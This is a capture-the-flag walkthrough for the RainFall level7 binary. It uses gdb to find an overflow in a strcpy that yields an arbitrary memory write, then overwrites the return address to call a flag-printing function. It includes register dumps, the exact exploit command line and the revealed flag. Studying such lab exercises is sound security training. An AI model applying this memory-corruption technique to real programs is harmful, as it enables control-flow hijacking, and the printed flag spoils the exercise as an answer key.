RainFall/level7/walkthrough

This program is tough to work with using gdb, because it reads a file but we don't have permission. To bypass this, we can change it so we're printing the current level flag. We need to be very careful tho, because changing the filename could alter the memory in some ways !!

We need to call function m cause it prints 0x8049960 which is the destination of fgets(flag) earlier in the main function. We can use 2 arguments to manipulate the stack as desired.

We get the return address with b *main+0 p $esp, and the address of m with p m.

we need to put the value 0x80484f4 at the address 0xbffffc5c.

We notice that the program segfault when argv[0] has more than 20 character, let's try to examine that.

We can see it breaks in the second strcpy, exactly at this instruction :

(gdb) x/10i $eip
=> 0xb7eb8f52:  mov    %eax,(%edx)
   0xb7eb8f54:  mov    0x4(%ecx),%al
   0xb7eb8f57:  mov    %al,0x4(%edx)
   0xb7eb8f5a:  mov    %edx,%eax
   0xb7eb8f5c:  ret
   0xb7eb8f5d:  lea    0x0(%esi),%esi
   0xb7eb8f60:  mov    (%ecx),%eax
   0xb7eb8f62:  mov    %eax,(%edx)
   0xb7eb8f64:  mov    0x4(%ecx),%ax
   0xb7eb8f68:  mov    %ax,0x4(%edx)
(gdb) i r
eax            0x74736574       1953719668
ecx            0xbffffe29       -1073742295
edx            0x46464646       1179010630
ebx            0xb7fd0ff4       -1208152076
esp            0xbffffc0c       0xbffffc0c
ebp            0xbffffc38       0xbffffc38
esi            0x0      0
edi            0x0      0
eip            0xb7eb8f52       0xb7eb8f52
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51


we are trying to copy to the address 0x46464646 which is nonsense, however what we are trying to put is eax or 0x74736574, or "test" in ascii, that's the second argument placeholder I used ! This is great, it means we can put any number at any place ! we just have to put the address of m into the ret address.

level7@RainFall:~$ ./level7 `python -c "print('A'*20+'\x5c\xfc\xff\xbf')"` `python -c "print('\xf4\x84\x04\x08')"`
~~
5684af5cb4c8679958be4abe6373147ab52d95768e047820bf382e44fa8d8fb9
 - 1747683470
Segmentation fault (core dumped)
level7@RainFall:~$

:)